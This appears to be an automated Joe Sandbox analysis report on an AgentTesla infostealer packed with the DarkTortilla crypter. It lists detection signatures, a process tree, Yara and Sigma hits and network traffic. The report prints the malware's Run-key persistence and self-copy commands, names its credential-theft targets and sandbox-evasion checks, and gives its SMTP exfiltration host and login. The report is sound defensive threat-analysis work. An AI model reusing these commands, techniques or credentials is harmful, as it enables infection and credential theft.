Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
image.exe

Overview

General Information

Sample name:image.exe
Analysis ID:1492221
MD5:043b9d0de6bad8fc4b4722987348329e
SHA1:6a344981c065f19b15736a0ed7afe92da6ef3cc0
SHA256:466b1cf9bae2d35d18dd3c8c9944861d770bf0dda89bb535d5566f12d7ccd11d
Tags:exe
Infos:

Detection

AgentTesla, DarkTortilla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains very large array initializations
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • image.exe (PID: 5024 cmdline: "C:\Users\user\Desktop\image.exe" MD5: 043B9D0DE6BAD8FC4B4722987348329E)
    • cmd.exe (PID: 5368 cmdline: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 2268 cmdline: ping 127.0.0.1 -n 16 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • reg.exe (PID: 3976 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 4788 cmdline: "cmd" /c ping 127.0.0.1 -n 28 > nul && copy "C:\Users\user\Desktop\image.exe" "C:\Users\user\AppData\Roaming\ACID.exe" && ping 127.0.0.1 -n 28 > nul && "C:\Users\user\AppData\Roaming\ACID.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3640 cmdline: ping 127.0.0.1 -n 28 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • PING.EXE (PID: 3548 cmdline: ping 127.0.0.1 -n 28 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • ACID.exe (PID: 6900 cmdline: "C:\Users\user\AppData\Roaming\ACID.exe" MD5: 043B9D0DE6BAD8FC4B4722987348329E)
        • InstallUtil.exe (PID: 1112 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • watchdog.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Local\Temp\watchdog.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
          • watchdog.exe (PID: 1832 cmdline: "C:\Users\user\AppData\Local\Temp\watchdog.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "evdanco.ru", "Username": "oleg@evdanco.ru", "Password": "[xkgyDSlzA(_"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
    0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000010.00000002.3445933830.00000000030DD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 32 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.image.exe.3c8a281.3.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
              0.2.image.exe.3c8a281.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.image.exe.3c8a281.3.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  0.2.image.exe.3c8a281.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.image.exe.3c8a281.3.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x4a1a9:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x9f999:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x1055f9:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x4a21b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x9fa0b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x10566b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x4a2a5:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x9fa95:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x1056f5:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x4a337:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x9fb27:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x105787:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x4a3a1:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x9fb91:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x1057f1:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x4a413:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x9fc03:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x105863:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x4a4a9:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x9fc99:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x1058f9:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    Click to see the 77 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\ACID.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3976, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ACID
                    Sigma detected: Direct Autorun Keys Modification
                    Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5368, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", ProcessId: 3976, ProcessName: reg.exe
                    Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", CommandLine: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\image.exe", ParentImage: C:\Users\user\Desktop\image.exe, ParentProcessId: 5024, ParentProcessName: image.exe, ProcessCommandLine: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe", ProcessId: 5368, ProcessName: cmd.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 80.96.42.133, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 1112, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49729

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://evdanco.ruAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeAvira: detection malicious, Label: TR/Agent.able
                    Found malware configuration
                    Source: 15.2.ACID.exe.6256fb8.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "evdanco.ru", "Username": "oleg@evdanco.ru", "Password": "[xkgyDSlzA(_"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeReversingLabs: Detection: 83%
                    Source: C:\Users\user\AppData\Roaming\ACID.exeReversingLabs: Detection: 34%
                    Multi AV Scanner detection for submitted file
                    Source: image.exeReversingLabs: Detection: 34%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ACID.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: image.exeJoe Sandbox ML: detected
                    Source: image.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49727 version: TLS 1.2
                    Source: image.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: VsUPptm.exe.16.dr
                    Source: Binary string: InstallUtil.pdb source: VsUPptm.exe.16.dr
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: ACID.exe, 0000000F.00000002.3441640640.00000000011EC000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeCode function: 4x nop then jmp 022B0B9Fh18_2_022B0960
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeCode function: 4x nop then jmp 022B0B9Fh18_2_022B094F
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeCode function: 4x nop then jmp 01120B9Fh19_2_01120960
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeCode function: 4x nop then jmp 01120B9Fh19_2_0112094F

                    Networking

                    barindex
                    Uses ping.exe to check the status of other devices and networks
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.6243d59.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3e03900.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.6256fb8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.6:49729 -> 80.96.42.133:587
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.6:49729 -> 80.96.42.133:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: evdanco.ru
                    Source: InstallUtil.exe, 00000010.00000002.3445933830.00000000030DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://evdanco.ru
                    Source: InstallUtil.exe, 00000010.00000002.3445933830.00000000030A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: image.exe, 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3445933830.00000000030A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: ACID.exe, 0000000F.00000002.3477111362.0000000007D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
                    Source: InstallUtil.exe, 00000010.00000002.3445933830.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: image.exe, 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: image.exe, 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3445933830.0000000003051000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: InstallUtil.exe, 00000010.00000002.3445933830.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: InstallUtil.exe, 00000010.00000002.3445933830.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49727 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, gmBpn1ecBmQ.cs.Net Code: KItL3kLLp
                    Source: 0.2.image.exe.3c9d502.6.raw.unpack, gmBpn1ecBmQ.cs.Net Code: KItL3kLLp
                    Source: 0.2.image.exe.3e03900.4.raw.unpack, gmBpn1ecBmQ.cs.Net Code: KItL3kLLp

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.ACID.exe.615681a.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.ACID.exe.6243d59.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.image.exe.3e03900.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.ACID.exe.6256fb8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.image.exe.3c47d02.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.image.exe.3e03900.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.image.exe.3c9d502.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.ACID.exe.62017da.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.ACID.exe.6256fb8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.ACID.exe.410d662.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: image.exe, o7KEd9.csLarge array initialization: o7KEd9: array initializer size 2194
                    Source: ACID.exe.7.dr, o7KEd9.csLarge array initialization: o7KEd9: array initializer size 2194
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: image.exe
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08526F78 CreateProcessAsUserW,15_2_08526F78
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_011383310_2_01138331
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_011375A00_2_011375A0
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_04BD4D770_2_04BD4D77
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_051208C90_2_051208C9
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_051276E10_2_051276E1
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_097008480_2_09700848
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_097008440_2_09700844
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0970C1B80_2_0970C1B8
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0970A7700_2_0970A770
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_097280B80_2_097280B8
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_09720A380_2_09720A38
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0972BDC00_2_0972BDC0
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0972BDBC0_2_0972BDBC
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_098AABC40_2_098AABC4
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_098AD5480_2_098AD548
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_098AD5580_2_098AD558
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_09AF0AB80_2_09AF0AB8
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_09AF00400_2_09AF0040
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0B2F2B000_2_0B2F2B00
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0B2F40660_2_0B2F4066
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0B2F2AF00_2_0B2F2AF0
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0B2F94100_2_0B2F9410
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_09AF0A940_2_09AF0A94
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_013E827815_2_013E8278
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_013E75A015_2_013E75A0
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_055708D815_2_055708D8
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_05578E2115_2_05578E21
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_078FD78815_2_078FD788
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_078FD79815_2_078FD798
